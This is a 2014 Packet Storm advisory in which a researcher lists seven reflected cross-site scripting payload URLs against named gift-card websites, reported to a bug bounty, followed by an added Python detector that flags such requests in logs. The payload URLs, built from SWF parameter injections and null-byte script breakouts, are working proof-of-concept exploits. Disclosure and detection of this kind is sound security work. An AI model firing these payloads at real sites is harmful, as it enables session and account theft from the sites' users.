Giftcard Cross Site Scripting

2014-02-19T00:00:00
ID PACKETSTORM:125281
Type packetstorm
Reporter Stefan Schurtz
Modified 2014-02-19T00:00:00

Description

`
  
Since November 2013 I have reported seven Cross-site Scripting  
vulnerabilities to the Giftcard Bug Bounty Program. Sadly, only one of  
them wasn't a duplicate :-/. Strange? Perhaps, but not impossible  
given the simplicity of the vulnerabilities.  
  
But what I really don't understand: Why do they still work today?  
  
######################################  
# 11/17/2013 Vulnerability #1: (DUP) #  
######################################  
  
// Reflected Cross-site Scripting  
  
http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}//  
  
// Original advisory  
  
http://insight-labs.org/?p=738  
  
Screenshot:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/player.swf-Sourcecode-Giftcardgirlfriend.com.JPG  
  
#########################################################  
# 11/17/2013 Vulnerability #2: - OK - Reward or not ;-) #  
#########################################################  
  
// Reflected Cross-site Scripting (tested with FF 25.0.1)  
  
http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//  
  
// Original Advisory  
  
http://inj3ct0rs.com/exploit/description/19711  
  
Screenshots:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/Wordpress-Version-SourceCode-giftcardgirlfriend.com.JPG  
  
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-swfupload-giftcardgirlfriend.com.JPG  
  
######################################  
# 11/21/2013 Vulnerability #3: (DUP) #  
######################################  
  
// Reflected Cross-site Scripting with SWF-Files (tested on Firefox 25.0.1)  
  
http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain);  
http://www.giftcards.com/swf/santa-sample.swf?va_link=javascript:alert(document.domain);  
  
Screenshots:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-SWFFiles-Giftcards.JPG  
  
http://darksecurity.de/advisories/BugBounty/giftcards/SWFScan-Screenshot.JPG  
  
######################################  
# 11/26/2013 Vulnerability #4: (DUP) #  
######################################  
  
// Reflected Cross-site Scripting with IE10  
  
https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script>  
  
Screenshot:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-OrderStatus-Giftcards.com.JPG  
  
################################  
# 12/05/2013 Vulnerability #5: #  
################################  
  
// Reflected Cross-site Scripting with IE10  
  
https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script>  
  
Screenshot:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Signup-Giftcards.com.JPG  
  
################################  
# 12/05/2013 Vulnerability #6: #  
################################  
  
// Reflected Cross-site Scripting with IE10  
  
https://www.giftcards.com/member?%00"><script>alert(document.domain)</script>  
  
Screenshot:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Member-Giftcards.com.JPG  
  
################################  
# 12/05/2013 Vulnerability #7: #  
################################  
  
// Reflected Cross-site Scripting with IE10  
  
http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script>  
  
Screenshot:  
  
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-GroupGifts-Giftcards.com.JPG  
  
  
Cheers,  
sschurtz  
`
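
A log-triage check for the two request shapes listed in the advisory above (script passed in a named parameter to a .swf file, and markup after a %00 in a key-less query string), added here as an example and not part of the original advisory. The function name, finding labels and sample URLs (placeholder host `www.example.test`) are constructed for illustration, and the patterns are heuristics rather than a complete XSS filter.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SCRIPT_URL = re.compile(r"[\x00-\x20]*javascript:", re.I)  # script URL in a SWF link parameter
JS_BREAKOUT = re.compile(r"[\"'\\(){}\[\]]")                # characters that escape a JS string or call
MARKUP = re.compile(r"<\s*script\b|[\"']\s*>", re.I)        # tag injection or attribute breakout


def classify(url):
    """Return a list of findings for one requested URL (empty list = nothing flagged)."""
    parts = urlsplit(url)
    decoded = unquote(parts.query)  # percent-decode the query string once
    findings = []
    # The IE10 cases put the payload in a key-less query string, which
    # parse_qsl() drops by default, so these checks run on the whole query.
    if "\x00" in decoded:
        findings.append("null-byte")
    if MARKUP.search(decoded):
        findings.append("markup-in-query")
    # The Flash cases pass the payload as a named parameter to a .swf file.
    if parts.path.lower().endswith(".swf"):
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if SCRIPT_URL.match(value):
                findings.append("swf-script-url:" + key)
            elif JS_BREAKOUT.search(value):
                findings.append("swf-js-breakout:" + key)
    return findings


# Constructed sample requests: placeholder host, shortened payloads.
SAMPLES = [
    "http://www.example.test/swf/card.swf?va_link=javascript:alert(document.domain)",
    "http://www.example.test/js/upload.swf?movieName=%22%5D)%7Dcatch(e)%7B%7D//",
    "https://www.example.test/signup?%00%22%3E%3Cscript%3Ealert(1)%3C/script%3E",
    "http://www.example.test/swf/card.swf?va_link=http://www.example.test/cards",
    "https://www.example.test/order-status?id=12345",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample) or "clean", sample)
```
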